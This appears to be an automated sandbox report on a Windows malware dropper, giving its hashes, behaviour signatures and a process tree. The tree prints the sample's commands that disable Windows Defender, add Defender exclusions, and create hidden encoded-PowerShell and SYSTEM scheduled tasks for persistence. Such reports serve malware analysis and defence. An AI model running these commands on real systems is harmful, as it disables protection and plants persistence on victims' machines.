Resubmissions
15-11-2024 18:05
241115-wpjcdsxrdy 1011-11-2024 21:40
241111-1h6xbsxcql 1003-12-2022 17:54
221203-wg4ncscc33 10Analysis
-
max time kernel
151s -
max time network
156s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
-
submitted
03-12-2022 17:54
General
-
Target
9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe
-
Size
6.3MB
-
MD5
ded964e022a37d93d434091ec75f9881
-
SHA1
e89a551ac1f19dc3838e21157667e2f98d84d06b
-
SHA256
9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde
-
SHA512
13f0873cc797eeb7a4a1606ea3dc95f0d1f96bf1dfad286ee3959f0b885426214c24c1ea2422a46191f78063b75200d7ad9065d5654a7758086a9e41f7cf75af
-
SSDEEP
196608:91OEVXHF+E/eq7QuIUVUMxVuAK1X84eu/k9RD13q:3OEVV+tq7Q7U62AAi84VkF13q
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
Windows security bypass 2 TTPs 26 IoCs
-
Executes dropped EXE 2 IoCs
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 4 IoCs
-
Windows security modification 2 TTPs 2 IoCs
-
Drops file in System32 directory 7 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 10 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe"C:\Users\Admin\AppData\Local\Temp\9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS2C7E.tmp\Install.exe.\Install.exe /S /site_id "525403"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&4⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:325⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:645⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"3⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gbLcEZgWV" /SC once /ST 05:33:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gbLcEZgWV"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gbLcEZgWV"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bKwcWZekAnYWEgmozo" /SC once /ST 17:57:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\fzTYnzT.exe\" q8 /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:322⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:642⤵
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {13A42C1D-70BA-4CE5-9438-78F7792847D6} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {10F470EE-4B87-463F-9FD5-D8A7FAF699F4} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\fzTYnzT.exeC:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\fzTYnzT.exe q8 /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gVYZViATT" /SC once /ST 05:01:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gVYZViATT"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gVYZViATT"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gPzuICkXm" /SC once /ST 01:17:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gPzuICkXm"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gPzuICkXm"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\YSrBLfWUtIHnuviW\dABIzlVU\IMShsJsQxMbVzBGm.wsf"3⤵
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\YSrBLfWUtIHnuviW\dABIzlVU\IMShsJsQxMbVzBGm.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "guyLksHzH" /SC once /ST 14:24:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "guyLksHzH"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "guyLksHzH"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵
- Windows security bypass
- Windows security modification
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MFUxwpyluZmBswWip" /SC once /ST 16:29:47 /RU "SYSTEM" /TR "\"C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\GcqQyff.exe\" 18 /site_id 525403 /S" /V1 /F3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "MFUxwpyluZmBswWip"3⤵
-
-
-
C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\GcqQyff.exeC:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\GcqQyff.exe 18 /site_id 525403 /S2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bKwcWZekAnYWEgmozo"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ZUXSmeDRU\gYXXzj.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "SEVCueFJyRflUhU" /V1 /F3⤵
- Windows security bypass
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "SEVCueFJyRflUhU2" /F /xml "C:\Program Files (x86)\ZUXSmeDRU\jNUTNJS.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "SEVCueFJyRflUhU"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "SEVCueFJyRflUhU"3⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "iJzencGmrLwIJF" /F /xml "C:\Program Files (x86)\UBqYudvSNocU2\UHOxEAS.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qYXqheuptEbIX2" /F /xml "C:\ProgramData\hrOORTLiECQfZJVB\PcCApgy.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JDYpgkNAOwNKhospY2" /F /xml "C:\Program Files (x86)\xonCRuklPFipnPeqKpR\jejLGpT.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hPTErtfTjvBJRSQKVfY2" /F /xml "C:\Program Files (x86)\oXjeNNLqKAotC\kQKBLUZ.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NGWtXtGwgKKYsphzV" /SC once /ST 09:49:10 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\YSrBLfWUtIHnuviW\ETZNIQto\ErUqFZU.dll\",#1 /site_id 525403" /V1 /F3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "NGWtXtGwgKKYsphzV"3⤵
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\YSrBLfWUtIHnuviW\ETZNIQto\ErUqFZU.dll",#1 /site_id 5254032⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\YSrBLfWUtIHnuviW\ETZNIQto\ErUqFZU.dll",#1 /site_id 5254033⤵
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-20007347411230214592-5332782202124709600-1999757986-12784091837764361672046400075"1⤵
- Windows security bypass
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1672199512208662246-1442337919-1407923995-1868172579-688911555-1771902422885398893"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1419378546-1123013627-924821754-241237605-1685456101055884420-630763554496455781"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "18444698762019964560-2115197877340827404-2289752211549515402084836242-520598002"1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:321⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
